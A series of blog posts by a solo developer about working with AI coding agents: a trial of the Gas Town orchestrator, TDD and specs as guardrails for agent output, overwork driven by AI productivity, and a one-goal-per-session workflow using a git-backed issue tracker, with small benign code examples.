Lakshmi Narasimhan — Thu, 29 Jan 2026 10:12:10 GMT

Steve Yegge released Gas Town on January 1st, 2026. An agent orchestrator for Claude Code. Multiple AI agents working in parallel, coordinated through git-backed task tracking, communicating via an internal mail system. The pitch: stop babysitting one Claude session. Run twenty.

His first rule: don’t use this in its first weeks.

I used it in its first week.

Why I Couldn’t Wait

I work across four projects solo. SaaS products, open source tools, content — the usual indie dev plate-spinning. Every Claude Code session I run is one session I’m not running somewhere else. The promise of parallel agents shipping code while I context-switch between projects was too compelling to resist.

So I installed Gas Town, added my projects as “rigs,” groomed six tasks into “beads,” and spawned six workers simultaneously.

My M2 MacBook responded by becoming a space heater that couldn’t render a terminal.

What Gas Town Actually Is

Before I explain what went wrong, let me translate the concepts. Gas Town uses Mad Max-inspired naming, which is either charming or maddening depending on your patience.

Town — Your workspace root (~/gt/). Think of it as the factory floor where everything lives.

Rig — A project container. Each of your repos becomes a rig inside the town. Not a git clone itself, but a wrapper that manages clones, worktrees, and workers for that project.

Beads — A git-backed issue tracker, also built by Steve. Every task, bug, or feature is a “bead” with a unique ID like supabyoi-9ue. They live in your repo’s .beads/ directory, committed alongside your code. Dependencies between beads create a task graph. I wrote about why this matters — AI agents lose all context when sessions end. Beads solve this by making work persist in git. This is the piece that genuinely works well.

Mayor — The global coordinator agent. You talk to the mayor, the mayor dispatches work. It sits above all rigs and orchestrates across projects.

Polecat — An ephemeral worker agent. Gets spawned with a task, works in its own git worktree, signals completion, gets cleaned up. The grunt labor.

Witness — Per-rig monitor that watches polecats. Detects stuck workers, nudges them, handles cleanup.

Deacon — Town-level watchdog that patrols all rigs. Monitors witnesses, refineries, everything.

Refinery — Per-rig merge queue processor. When a polecat finishes, the refinery handles the PR/merge workflow.

Convoy — Batch tracker for related work. Group six beads into a convoy, dispatch them, track progress as a unit.

Molecules — Reusable workflow templates. Formula defines the pattern, molecule is the running instance.

That’s ten concepts before you write a line of code. Steve’s mental model is a steam engine: agents are pistons, work flows through hooks, everything runs on the “Propulsion Principle” — if you find work on your hook, you execute immediately.

The architecture borrows from Erlang’s supervisor trees (I think), a pattern from telecom systems where processes are organized in a hierarchy. Each parent monitors its children: if a child crashes, the parent restarts it. In Gas Town, the Deacon watches Witnesses, Witnesses watch Polecats, and failures escalate upward. This is a proven pattern that runs phone switches serving millions of calls. The catch: Erlang processes are lightweight (microseconds to spawn, kilobytes of memory). Claude Code sessions are heavy (seconds to spawn, gigabytes of memory). When each “process” is a full AI session burning tokens, the economics of cheap failure recovery invert.
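The supervisor idea itself fits in a few lines. The sketch below is a toy in Python, not Gas Town’s code and not the Erlang/OTP API; the class and the flaky worker are invented for illustration. A parent restarts a crashing child until a restart budget runs out, then passes the failure up to its own parent.

```python
from typing import Callable


class Supervisor:
    """Restart a failing child up to max_restarts times, then escalate."""

    def __init__(self, child: Callable[[], str], max_restarts: int = 3):
        self.child = child
        self.max_restarts = max_restarts
        self.restarts = 0

    def run(self) -> str:
        while True:
            try:
                return self.child()
            except Exception as exc:
                if self.restarts >= self.max_restarts:
                    # Out of budget: let the failure propagate to our parent.
                    raise RuntimeError("child kept crashing, escalating") from exc
                self.restarts += 1


def make_flaky_worker(failures_before_success: int) -> Callable[[], str]:
    """Hypothetical worker that crashes a fixed number of times, then succeeds."""
    state = {"calls": 0}

    def worker() -> str:
        state["calls"] += 1
        if state["calls"] <= failures_before_success:
            raise ValueError("worker crashed")
        return "done"

    return worker
```

In this toy a restart is one extra function call. In Gas Town each restart is a fresh Claude Code session, which is why the cost argument above matters.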

What Actually Happened

Week One: The Learning Curve

The first session was pure orientation. I needed Claude to explain Gas Town to me while inside Gas Town. The cognitive overhead of mapping “polecat” to “worker” and “rig” to “project” consumed real mental energy that should have gone to actual work.

The 80/20 path is supposed to be:

gt up            # Boot everything
gt mayor attach  # Talk to the mayor

In practice, gt up failed because the bd (beads daemon) version check timed out. This led me down a rabbit hole patching the version comparison in Go: replacing a time.Equal() check with a comparison of time.Unix() values, because JSON serialization was losing nanosecond precision. I was debugging the orchestrator instead of using it.
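The actual patch was in Go, but the general failure mode is easy to reproduce in Python. This is a sketch of the bug class, not the bd code, and it assumes the serialized form keeps only whole seconds; the field name built_at is made up. A timestamp with sub-second precision no longer equals itself after the round trip, while a comparison at second granularity still matches.

```python
import json
from datetime import datetime, timezone


def roundtrip_seconds(ts: datetime) -> datetime:
    """Serialize to JSON as whole Unix seconds and parse it back."""
    payload = json.dumps({"built_at": int(ts.timestamp())})
    seconds = json.loads(payload)["built_at"]
    return datetime.fromtimestamp(seconds, tz=timezone.utc)


def same_second(a: datetime, b: datetime) -> bool:
    """Compare two timestamps at the precision the wire format preserves."""
    return int(a.timestamp()) == int(b.timestamp())


original = datetime(2026, 1, 5, 12, 0, 0, 123456, tzinfo=timezone.utc)
restored = roundtrip_seconds(original)

exact_match = original == restored               # False: sub-second part is gone
second_match = same_second(original, restored)   # True
```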

Week Two: Six Polecats and a Space Heater

Once things stabilized, I got ambitious. Six beads groomed, six polecats spawned:

gt sling supabyoi-9ue supabyoi
gt sling supabyoi-abc supabyoi
# ... four more

Each polecat is a full Claude Code session in its own tmux pane with its own git worktree. Six of those plus a mayor, witnesses, refineries, deacons, and multiple bd daemons meant my M2 was running 20+ processes competing for resources.

The system didn’t crash. It degraded. Commands took minutes to respond. Shell execution broke mid-session. I had to kill processes manually and nuke the setup.

But here’s the thing — that wasn’t entirely Gas Town’s fault. Six concurrent Claude sessions will hammer any laptop. The real issue was that Gas Town spawned orphaned daemon processes that accumulated across restarts. I found six bd daemons running simultaneously, plus stuck bd mol burn processes from days ago that never cleaned up.
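Spotting this kind of pile-up does not need anything fancy. The sketch below is a hypothetical helper, not a Gas Town command. It takes process-list text with one "<pid> <command>" pair per line and reports commands that are running more than once.

```python
from collections import defaultdict


def find_duplicates(ps_output: str, needle: str) -> dict[str, list[int]]:
    """Group PIDs by command for processes whose command contains `needle`.

    Expects one process per line in the form "<pid> <command...>".
    Returns only the commands that appear more than once.
    """
    by_command: dict[str, list[int]] = defaultdict(list)
    for line in ps_output.splitlines():
        pid_text, _, command = line.strip().partition(" ")
        if not pid_text.isdigit() or needle not in command:
            continue
        by_command[command.strip()].append(int(pid_text))
    return {cmd: pids for cmd, pids in by_command.items() if len(pids) > 1}


# Made-up sample resembling what I saw: two daemons, one stuck burn, one editor.
sample = """
  101 bd daemon
  202 bd daemon
  303 bd mol burn
  404 vim notes.md
"""
duplicates = find_duplicates(sample, "bd ")
```

On most systems, something like ps axo pid=,command= should produce text in this shape, but check your platform’s ps before relying on it.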

The Doctor Loop

Gas Town has a gt doctor command — a health check that reports errors and warnings. I ran it constantly.

First run: 1 error, 11 warnings. After gt doctor --fix: 4 fixed, 7 remaining. After restart: new errors. After bd daemon restart: timeout errors. After updating bd from v0.47.0 to v0.47.2: different errors.

Each fix revealed the next problem. The mayor’s CLAUDE.md was 280 lines (should be under 30). Environment variables from dead sessions broke prefix routing. Beads databases pointed to wrong paths. Symlinks needed codesigning to avoid macOS killing the binary.

It felt less like using a tool and more like being a system administrator for a tool.

What Genuinely Works

Beads: The git-backed issue tracker is solid. Creating tasks, tracking dependencies, finding ready work — this layer does its job. It survived every crash and restart because it’s just files in git. Steve built Beads as a standalone tool before Gas Town, and it’s the strongest foundation in the stack.

Worktree isolation: Each worker gets its own git worktree. No merge conflicts between parallel work. Clean separation. This is the right primitive.

The hub/worker model: Having a coordinator dispatch tasks to isolated workers is correct. The mental model of “groom beads, dispatch to workers, merge results” is sound.

gt doctor: Despite the loop, having a comprehensive health check that can auto-fix common issues is genuinely useful infrastructure.
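The “finding ready work” part of a dependency-tracked task list comes down to a small rule: a task is ready when it is open and everything it depends on is closed. The sketch below shows that rule with a plain dictionary. The task IDs, field names, and statuses are hypothetical and do not reflect Beads’ actual storage format or CLI.

```python
def ready_tasks(tasks: dict[str, dict]) -> list[str]:
    """Return IDs of open tasks whose dependencies are all closed."""
    ready = []
    for task_id, task in tasks.items():
        if task["status"] != "open":
            continue
        deps = task.get("deps", [])
        if all(tasks[dep]["status"] == "closed" for dep in deps):
            ready.append(task_id)
    return sorted(ready)


# Hypothetical graph: b depends on a (closed), c depends on b (still open).
example = {
    "task-a": {"status": "closed"},
    "task-b": {"status": "open", "deps": ["task-a"]},
    "task-c": {"status": "open", "deps": ["task-b"]},
    "task-d": {"status": "open"},
}
dispatchable = ready_tasks(example)  # ["task-b", "task-d"]
```

Because the graph lives in files, the same computation gives the same answer after a crash or restart, which is what makes this layer dependable.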

What Doesn’t Work Yet

Daemon management: Orphaned processes are the #1 pain. bd daemons accumulate, stuck processes never clean up, version checks time out. This is being fixed (v0.5.0 added process group killing), but it was brutal in weeks one and two.

The naming: I’m not trying to be uncharitable. But “polecat” adds zero information over “worker.” “Molecule” adds confusion over “workflow.” Every conversation about Gas Town requires a glossary. When a Hacker News commenter pointed out the irony — Steve Yegge wrote “Execution in the Kingdom of Nouns” mocking over-abstraction — it stung because it’s accurate.

Human as dispatcher: This is the core limitation. Despite all the automation, the mayor waits for you. Issue #694 on GitHub tracks exactly this: “Mayor lacks automated dispatch patrol molecule.” Community members built external cron scripts to poke the system. That tells you everything.

Cost and resource usage: Multiple reports of $100/hour token burn rates. DoltHub’s field test found none of the PRs were good enough to merge. The economics only work if the agents produce mergeable code reliably.

What I’m Building Instead

Gas Town taught me what I need. It also taught me what I don’t.

I wrote about why I’m building my own agent orchestrator. It’s called wt. The core idea: keep the infrastructure that works (beads, worktrees, tmux), strip the ceremony that doesn’t (polecats, molecules, deacons, refineries).

Where Gas Town has ten concepts, wt has three: hub, worker, task. That’s it.

The hub coordinates. Workers execute in isolated worktrees. Tasks are beads with dependencies. No mail system, no witness layer, no convoy abstraction. If a worker finishes, the hub sees it in the dashboard. If a worker gets stuck, you look at the terminal. No intermediate monitoring agent needed.

The key difference: wt is a pluggable orchestrator. Each project gets its own config — yolo mode for prototypes (no tests, auto-merge, maximum speed), strict mode for production code (tests required, PR review, quality gates), or anything in between. Gas Town is one-size-fits-all. Real projects aren’t.
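To make “pluggable” concrete, here is a purely illustrative sketch of per-project policies. It is not wt’s actual config format or code; every name in it is an assumption. It only shows how the two modes described above could lead to different merge decisions.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ProjectPolicy:
    require_tests: bool
    require_review: bool
    auto_merge: bool


# Two presets mirroring the modes described above (names are hypothetical).
YOLO = ProjectPolicy(require_tests=False, require_review=False, auto_merge=True)
STRICT = ProjectPolicy(require_tests=True, require_review=True, auto_merge=False)


def merge_decision(policy: ProjectPolicy, tests_passed: bool, reviewed: bool) -> str:
    """Decide what happens to a finished worker's branch under a policy."""
    if policy.require_tests and not tests_passed:
        return "blocked: tests"
    if policy.require_review and not reviewed:
        return "blocked: review"
    return "auto-merge" if policy.auto_merge else "ready for manual merge"
```

Anything “in between” would be another ProjectPolicy with a different mix of the three flags.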

It’s early. But two weeks of wrestling Gas Town gave me the blueprint for what comes next.

What I’m Taking Away

Gas Town is a research prototype that got released into the wild. Steve warned people. I didn’t listen.

But I don’t regret it. Two weeks of wrestling gave me clarity about what agent orchestration actually needs:

Beads (or equivalent) is non-negotiable. Git-backed task tracking with dependencies is the foundation. Without it, agents have no memory across sessions.
Worktree isolation is the right primitive. One agent, one worktree, no conflicts. Simple and correct.
The hub/worker model works — if the hub is smart. The dispatcher problem is the real unsolved challenge. Manual dispatch defeats the purpose.
Simplicity beats power. Three concepts (hub, worker, task) cover 90% of the use cases. Ten concepts with Mad Max names cover 95% but cost you 5x the cognitive overhead.
Your laptop has limits. Two to three concurrent workers is practical on a MacBook. Six is aspirational. Twenty is a data center problem.

Steve Yegge is doing genuinely new work here. Nobody else has shipped a multi-agent orchestrator for Claude Code with this level of ambition. The HN comment that stuck with me: “Gas Town is cackling mad laughter from someone both insane and prescient simultaneously. Today it’s insane. But expect serious versions in the future informed by these early experiments.”

I broke the first rule. I’d do it again. Just maybe with fewer polecats next time.

Software Engineering Is Dead, or Is It?

Lakshmi Narasimhan — Tue, 27 Jan 2026 15:32:16 GMT

Everyone said agentic coding would kill software engineering discipline. Turns out it killed the wrong disciplines.

Clean code? Dead. Nobody’s hand-crafting variable names when Claude generates 500 lines in 30 seconds. But TDD, specs-driven development, domain-driven design — the stuff we used to skip because it felt like ceremony? That’s the load-bearing wall now. Tear it out and the whole thing collapses.

TDD: The Cache That Wasn’t

I had Claude Code build me a Redis caching module. Proper TTLs. Cache invalidation on writes. Unit tests passing. Beautiful, elegant, chef’s-kiss code.

One problem. The actual query functions never called the caching layer.

Hundreds of requests later, I checked Redis. Empty. A pristine, untouched Redis instance, sitting there like a museum exhibit. I’ve written about these failure patterns before — this one hurt the most.

Integration tests would have caught it. But only if I’d written them first. That’s the part everyone skips — writing the verification before the implementation. TDD forces you to define “done” before the agent starts building. Without it, you get beautiful isolated components that nobody wired together.
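Here is roughly what that missing test looks like. It is a minimal sketch with in-memory fakes standing in for Redis and the database; the class and function names are invented for illustration and are not from the real project. The test does not ask whether the cache module works. It asks whether the query path uses it.

```python
class FakeCache:
    """In-memory stand-in for Redis."""

    def __init__(self):
        self.store = {}

    def get(self, key):
        return self.store.get(key)

    def set(self, key, value):
        self.store[key] = value


class CountingDB:
    """Fake database that counts how often it is queried."""

    def __init__(self):
        self.calls = 0

    def fetch_user(self, user_id):
        self.calls += 1
        return {"id": user_id, "name": "Ada"}


def get_user(user_id, db, cache):
    """Query path under test: consult the cache before the database."""
    key = f"user:{user_id}"
    cached = cache.get(key)
    if cached is not None:
        return cached
    user = db.fetch_user(user_id)
    cache.set(key, user)
    return user


def test_second_read_is_served_from_cache():
    db, cache = CountingDB(), FakeCache()
    first = get_user(42, db, cache)
    second = get_user(42, db, cache)
    assert first == second
    assert db.calls == 1              # the second read never reached the database
    assert "user:42" in cache.store   # the cache was actually populated
```

A get_user that skips the cache still returns correct data, so unit tests on either piece stay green. Only the db.calls assertion fails, and that is the failure I needed to see.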

This isn’t hypothetical. An r/programming thread (894 upvotes) nailed it: “We’re getting correct code, but not right code.” One reviewer found AI-generated Java using the default ForkJoinPool for I/O-bound tasks. Compiles fine. Passes unit tests. Catastrophic under load.

My favorite was the “chief architect” who generated “full coverage” unit tests with Copilot. Duplicate asserts. Unused service constructions. Tests that passed but tested nothing. A green CI pipeline that was essentially a participation trophy.

TDD isn’t ceremony anymore. It’s the spec your agent actually follows.

Specs-Driven Development: The Authentication Amnesia

I spent two weeks pair-programming authentication with Claude Code. We tracked race conditions together. Debated RS256 vs HS256. Built a shared understanding of every edge case.

Then compaction hit.

“Where did we leave off?”

“I don’t have information about previous sessions.”

Two weeks of context. Gone. My TODO.md became a graveyard of cryptic notes that made sense to exactly nobody, including me three days later. I wrote the full horror story here.

So I started using a git-backed issue tracker with dependency graphs that persists across agent sessions. Sprints and epics stopped being PM ceremony and became the agent’s memory. The control plane for multi-session work.

The pattern scales beyond my personal disasters. An r/programming post titled “The era of AI slop cleanup has begun” (4,200 upvotes) described a freelancer who keeps getting hired to fix AI-generated codebases. “It mostly works, but does so terribly.” The missing ingredient every single time: no structured planning, no phased delivery. Just vibes and a prompt.

Fred Brooks said it decades ago, and r/ExperiencedDevs rediscovered it (1,400 upvotes): “Once requirements are fully expressed, their information content is fixed. You can change surface syntax, but you can’t compress semantics.”

You can’t skip the thinking. You can only skip writing it down — and then you pay for it later when your agent wakes up with amnesia.

DDD: The Firewall Agents Can’t Generate

Here’s a Reddit thread that lives in my head rent-free. Someone described the “Phantom Author” problem — only domain experts catch the subtle flaws agents produce. The code compiles. The tests pass. The logic is plausible. But it’s wrong in ways only someone who understands the domain would notice.

The punchline: “Ironically the only people who should be using AI are people who are already experts.”

Bounded contexts — the core DDD concept — are the firewall. They tell the agent where one domain ends and another begins. Without that modeling, agents connect everything to everything. Your billing module knows about your notification preferences. Your auth layer has opinions about your recommendation engine.

Agents can’t generate domain boundaries because domain boundaries come from understanding the business, not the code. That’s your job. The agent’s job is everything inside the boundary.
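Once you have drawn the boundaries, checking them is the easy part. The sketch below assumes you can produce a map of which module imports which, and an allow-list of permitted cross-context dependencies. Both are hypothetical inputs, and the module names simply echo the examples above.

```python
def boundary_violations(
    imports: dict[str, set[str]],
    allowed: dict[str, set[str]],
) -> list[tuple[str, str]]:
    """List (module, dependency) pairs that cross a boundary not on the allow-list."""
    violations = []
    for module, deps in imports.items():
        for dep in deps:
            if dep != module and dep not in allowed.get(module, set()):
                violations.append((module, dep))
    return sorted(violations)


# Hypothetical project: billing may depend on auth, and nothing else is allowed.
found = boundary_violations(
    imports={
        "billing": {"auth", "notifications"},
        "auth": {"recommendations"},
    },
    allowed={"billing": {"auth"}},
)
```

The allow-list is the part no agent can write for you. The check only enforces decisions a human already made.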

The Punchline

The disciplines that survived aren’t the ones that made code pretty. They’re the ones that tame complexity.

TDD tells the agent what “done” means. Specs give it memory across sessions. DDD gives it boundaries it can’t infer on its own.

We didn’t need less engineering discipline. We needed different engineering discipline. The ceremony is dead. The structure is mandatory.

The AI Productivity Paradox: Why I'm Working More Than Ever

Lakshmi Narasimhan — Mon, 26 Jan 2026 08:32:29 GMT

I had a conversation with a friend last week that I can’t stop thinking about.

We were comparing notes on hitting usage limits with AI coding tools. Both of us on expensive plans. Both of us running into ceilings more often than we did months ago. Both of us, apparently, turning into “power users” in our respective tiers.

And then he dropped this line: “So AI was supposed to make us work less but now we are working more. That’s the conclusion.”

I laughed. Then I stopped laughing.

Because he’s right. I get more done in a single day than I used to accomplish in a week. I’m shipping features, writing content, running experiments at a pace that would’ve been unthinkable about a year ago.

And I have never worked this much in my life.

Here’s what nobody warned us about: AI didn’t give us more time. It gave us more capability.

And capability, it turns out, is extremely addictive.

The Collapse of Activation Energy

Before AI coding assistants, most ideas died a quiet death in my notes app. Not because they were bad ideas. Because the effort-to-value ratio was unfavorable.

“I could build that feature, but it would take a week of focused work. Is it worth a week? Probably not.”

Idea archived. Moving on.

Now that same feature takes a day. Sometimes less. So I build it.

Then I build the next thing. And the next. And suddenly I’m shipping more in a month than I used to ship in a quarter.

The activation energy for starting new work collapsed. And I filled every inch of the newly available space.

Ambition Scales With Output

Here’s the thing about humans: we don’t scope our ambitions in absolute terms. We scope them relative to what feels achievable.

Before AI, I planned projects based on what I could reasonably ship with my limited time and energy. A feature per week. Maybe two if I was focused.

Now “reasonable” means something entirely different. My mental model of what’s achievable expanded by 5x, and my project scope expanded right along with it.

I’m not doing the same work faster. I’m doing more work.

The goalposts moved. And I moved them myself.

The Death of Natural Stopping Points

There used to be friction in development work. Waiting for builds. Context switching costs. The mental load of holding an entire system in your head while debugging.

That friction was annoying. It was also a circuit breaker.

It forced breaks. It created natural pauses where you’d step away, get coffee, maybe realize it was 7pm and you should probably eat dinner.

AI removed the friction. Which sounds great until you realize the friction was also your automatic brake pedal.

Now you can go from idea to implementation to deployment without ever hitting a natural stopping point. The only thing that stops you is your own willpower.

My willpower, for the record, is not great.

The Dopamine Loop of Shipping

Here’s an uncomfortable comparison: AI-assisted coding feels a lot like infinite scroll.

You ship something. It feels good. The tool makes shipping fast and easy. So you ship something else. That also feels good. And there’s always one more thing you could ship.

Same psychological mechanics. Different output.

Except instead of consuming content, you’re producing it. Which feels more virtuous. Which makes it even harder to stop.

“I’m not doomscrolling. I’m being productive.”

Sure you are.

The “Why Not” Threshold

The most insidious change is what happened to my internal cost-benefit calculator.

I used to ask: “Is this worth the effort?”

Now I ask: “Why wouldn’t I just do this?”

That experiment I would’ve skipped because setting it up was tedious? Now I run it. That edge case I would’ve ignored because fixing it properly would take half a day? Now I fix it.

The threshold for “worth my time” dropped to near zero. So everything is worth my time. So I do everything.

This is how you end up working 12-hour days while technically being more “efficient” than ever before.

The Uncomfortable Truth

AI tools didn’t give us more free time. They gave us more output capacity. And we’re psychologically incapable of leaving capacity unused. At least I am.

The work expanded to fill the available capability. Parkinson’s Law, but for capability instead of time.

We’re not working less. We’re shipping more while feeling productive. Which is a different thing entirely.

When my friend signed off by wishing me a good weekend “off,” he was right to use the scare quotes. We both knew I wasn’t really taking time off. I was just switching to a different kind of work.

What Now?

I don’t have a tidy solution here. I’m not going to pretend I’ve figured out work-life balance in the age of AI assistants.

But I’ve started noticing when I’m filling capacity just because I can. When I’m starting a new feature not because it matters, but because the activation energy is so low that “why not” won the argument.

Sometimes the answer to “why not” is: because you could just... not.

Groundbreaking insight, I realize.

The AI isn’t going to set boundaries for you. If anything, hitting usage limits might be the only forced break some of us get. Which is both sad and a little funny.

Maybe the real productivity hack is learning to leave capability on the table.

I’ll let you know how that goes. Right after I ship this one more thing.

I write about building and deploying software as a solo developer. If you’re trying to do it all yourself without hiring a team, I’m probably making the same mistakes you are.

I Built 2 SaaS Products Vibe Coding. Here's the System That Made It Work.

Lakshmi Narasimhan — Sat, 24 Jan 2026 14:06:41 GMT

Gene Kim and Steve Yegge’s Vibe Coding book says you’re the head chef now.

The metaphor runs through the whole thing: you’re not a line cook anymore, you’re orchestrating AI sous chefs, directing the kitchen, tasting every dish before it goes out. The developer-as-implementer era is over. Welcome to developer-as-orchestrator.

The Biryani Incident

It’s a good metaphor. I buy it. But here’s the thing about being a head chef that the metaphor doesn’t quite capture: a head chef without mise en place is just a guy having a panic attack near hot surfaces.

I know this because I’ve been that guy. Literally.

My wife had to leave town for a few days. “I’ll handle dinner,” I said, with the confidence of someone who has watched many cooking videos and successfully boiled pasta multiple times. I decided to make veg biryani — a dish my wife makes effortlessly, layering rice and vegetables and spices into something that tastes like it required more effort than it actually did.

“Prep everything first,” she told me before leaving. “Soak the basmati rice. Marinate the paneer. Chop the vegetables for layering. Have it all ready before you start cooking.”

Reader, I did not do this.

I started frying onions. While the onions were going, I realized I hadn’t marinated the paneer. So I started cubing paneer and mixing yogurt and spices. Then the onions started burning. I ran back, stirred frantically, ran back to the paneer. Remembered I needed to soak the basmati. Started the rice soaking. The onions were now definitely burned. I scraped them out, started over, but now I was behind, so I tried to do the vegetables and the new onions simultaneously while the paneer sat half-marinated...

An hour later I had a kitchen that looked like a crime scene, three pans with various stages of failure in them, and something that was technically edible but bore no resemblance to biryani. My wife, via video call, watched me plate this disaster with the expression of someone who had specifically warned against this exact outcome.

The problem wasn’t skill. I can cook. The problem was that prep and execution were bleeding into each other. I was trying to figure out what I needed while also doing the thing. And it turns out you can’t actually do both. Not well, anyway.

I’ve been that guy with AI sous chefs too.

I’ve been vibe coding since mid-2025. By “vibe coding” I mean the thing where you describe what you want in natural language and an AI writes the code. You know, the future we were promised, except the future has some sharp edges nobody mentioned in the demos.

Two SaaS products. Real users. Real revenue. Not toy projects, not “look ma I generated a todo app” tutorials, not the kind of thing you show off on Twitter and then quietly delete three weeks later. Actual products that people pay actual money for.

So when I tell you what follows, understand: this isn’t theory. This is what I learned by shipping real things and watching everything that could go wrong go wrong.

The Markdown Hemorrhage

For the first few months, I was that chef.

I’d sit down to implement a feature. Claude and I would get rolling. Then I’d notice a bug. Well, I’m already here, might as well fix the bug. Then while fixing the bug, I’d realize the error handling was inconsistent. Better clean that up. Oh, and there’s still context left in the window — might as well tackle that other feature I’ve been meaning to add.

Two hours later: three half-finished things, Claude confused about which task we’re actually doing, and code quality somewhere between “works” and “I’m not sure why.”

And the markdown. God, the markdown.

Claude, bless its heart, wanted to help me remember things. So it started creating files. ARCHITECTURE.md. DECISIONS.md. IMPLEMENTATION_NOTES.md. TODO.md. CONTEXT.md. CHANGELOG.md. README_UPDATED.md.

I call this markdown hemorrhage. The AI equivalent of a kitchen where every surface is covered with prep bowls, half-chopped vegetables, and sticky notes that say “DON’T FORGET THE SAUCE” — technically documentation, practically chaos.

At one point I had so many markdown files that I needed another AI tool just to search through the documentation I’d created for my AI tool.

This was clearly insane.

But here’s the thing that took me embarrassingly long to figure out: the problem wasn’t the tools. The problem was me.

One Goal Per Session

I was treating every Claude session like a buffet.

You know how it goes. The feature leads to a bug, the bug leads to a cleanup, the cleanup leads to that other feature you’ve been meaning to add, all in one window. Two hours later Claude is confused about which task it’s actually working on, and so are you.

I call this context pollution. And once I named it, I started seeing it everywhere.

LLMs are bad at juggling multiple goals. This isn’t a Claude problem. In my experience it holds for these models in general: ask them to hold multiple objectives in one context and they get worse at all of them. Not a little worse. Dramatically worse.

The fix sounds almost stupidly simple: one goal per session.

That’s it. That’s the whole trick. One goal. One session. If you discover a bug while implementing a feature, you write down the bug and get back to the feature. The bug gets its own session later. No “while I’m here” detours. No context pollution.

“But what about efficiency?” I hear you asking. “Isn’t it wasteful to end a session when there’s still context left?”

This is the trap. This is exactly the thinking that leads to burned onions and half-marinated paneer. The leftover context is not an asset. It’s a liability. It’s your coworker with three tasks open, doing all of them poorly, about to forget everything anyway.

End the session. Start fresh. One goal.

The Mise en Place

Now, this discipline only works if you have a way to track what you’re not doing.

If every bug you discover gets deferred to a later session, you need somewhere for that bug to live. Otherwise you’ll forget it. The bugs pile up in your head, you context-switch mentally, and you’re back where you started.

This is where beads comes in.

Beads is a git-backed issue tracker that Claude can read and write. Steve Yegge built it (yes, that Steve Yegge — the guy who wrote the platforms rant and approximately nine million words about Emacs). The idea is simple: every task becomes a “bead.” Claude creates them, updates them, closes them. They survive compaction. They sync through git.

I installed it. I ran bd init. And then something clicked.

See, beads isn’t just a todo list. It’s a forcing function. When you start a session, you run bd ready and it shows you what’s available to work on. You pick one. Not three. One.

And when you discover a bug mid-session? You tell Claude to create a bead for it. Claude writes it down, logs the context, notes any relevant details. Then you move on. The bug exists now. It has a home. You don’t have to hold it in your head.

The discipline and the tool reinforce each other. One bead per session only works because beads exist to capture everything else. And beads only work because the discipline prevents you from drowning in them.
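
To make the forcing function concrete, here is a toy sketch of the loop in Python. It is not the beads API or its data model: the Bead and Tracker classes, the field names, and run_session are all hypothetical, and everything lives in memory instead of git. It only illustrates the two rules described above: "ready" means open with no open blockers, and a session closes exactly one bead while anything discovered along the way is captured, not worked on.

```python
from __future__ import annotations

from dataclasses import dataclass, field


@dataclass
class Bead:
    """One unit of work. Field names are illustrative, not the beads schema."""
    id: str
    title: str
    status: str = "open"  # "open" or "closed"
    blocked_by: set[str] = field(default_factory=set)


class Tracker:
    """Toy in-memory tracker; the real tool persists issues through git."""

    def __init__(self) -> None:
        self.beads: dict[str, Bead] = {}
        self._next_id = 1

    def create(self, title: str, blocked_by: set[str] | None = None) -> Bead:
        bead = Bead(id=f"b{self._next_id}", title=title,
                    blocked_by=set(blocked_by or ()))
        self._next_id += 1
        self.beads[bead.id] = bead
        return bead

    def ready(self) -> list[Bead]:
        """Open beads whose blockers are all closed."""
        return [
            b for b in self.beads.values()
            if b.status == "open"
            and all(self.beads[dep].status == "closed" for dep in b.blocked_by)
        ]

    def close(self, bead_id: str) -> None:
        self.beads[bead_id].status = "closed"


def run_session(tracker: Tracker, bead_id: str, discovered: list[str]) -> None:
    """One session: file what you discover, close only the bead you picked."""
    if bead_id not in {b.id for b in tracker.ready()}:
        raise ValueError(f"{bead_id} is not ready to work on")
    for title in discovered:
        tracker.create(title)  # the bug gets a home, but no attention yet
    tracker.close(bead_id)


tracker = Tracker()
schema = tracker.create("Add invoices table")
api = tracker.create("Invoice API endpoint", blocked_by={schema.id})

print([b.title for b in tracker.ready()])
# ['Add invoices table']

run_session(tracker, schema.id,
            discovered=["Bug: timezone off by one in reports"])
print([b.title for b in tracker.ready()])
# ['Invoice API endpoint', 'Bug: timezone off by one in reports']
```

The point of the sketch is the shape of run_session: it takes a single bead id, so "one bead per session" is enforced by the signature and not by willpower.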

Grooming vs. Coding

But I’m getting ahead of myself. Let me tell you about grooming.

In my old workflow, I’d sit down and just... start. Open Claude, describe what I wanted, begin coding. Very vibe. Very chaotic. Whatever felt right in the moment.

The problem is that “figuring out what to do” and “doing the thing” are completely different cognitive modes. One is divergent — you’re exploring possibilities, breaking down problems, identifying edge cases. The other is convergent — you’re executing, making decisions, writing code.

When you mix them, you get mush.

So now I run two types of sessions:

Grooming sessions are for thinking. I’m not coding. I’m not even planning to code in this session. I’m creating beads. Breaking down a feature into pieces. Identifying dependencies. Noting edge cases. If I think of an unrelated feature while grooming, it gets written down — for a different grooming session. No cross-contamination.

Coding sessions are for execution. One bead. Implement it. If I discover a bug, I note it and keep going unless it’s blocking. The bug gets groomed and coded in its own sessions later.

This separation is the whole game. It sounds bureaucratic. It sounds like exactly the kind of process that “vibe coding” was supposed to eliminate. But here’s the secret: this discipline is what makes vibe coding actually work at scale. Without it, you’re just generating code and hoping. With it, you’re building systems.

A Few Other Things

MCPs should be loaded at project level, not globally. Every MCP eats context. If a project doesn’t need the Reddit MCP, it doesn’t get the Reddit MCP. Context is expensive. Guard it like it’s money, because in a very real sense, it is.
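
As a sketch of what "project level" can look like, the Python below writes a project-scoped MCP config file. It assumes Claude Code picks up project-scoped servers from a .mcp.json file at the project root with a top-level mcpServers key; check the current Claude Code docs before relying on that. The server name, command, and package name are placeholders, not real recommendations.

```python
import json
from pathlib import Path


def project_mcp_config(servers: dict) -> str:
    """Render a project-scoped MCP config as JSON text."""
    return json.dumps({"mcpServers": servers}, indent=2)


def write_config(project_root: Path, text: str) -> Path:
    """Write the config to <project_root>/.mcp.json and return its path."""
    path = project_root / ".mcp.json"
    path.write_text(text + "\n", encoding="utf-8")
    return path


# Hypothetical entry: only the one server this project actually needs.
config_text = project_mcp_config({
    "postgres-readonly": {
        "command": "npx",
        "args": ["-y", "example-postgres-mcp-server"],
    }
})

print(config_text)
```

Calling write_config(Path("."), config_text) from the project root would put the file next to the code it serves, so a different project never pays the context cost for this server.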

Autocompact should be off. I want to control when context resets, not have the algorithm decide for me mid-feature. Yes, this means manually managing sessions. That’s the point.

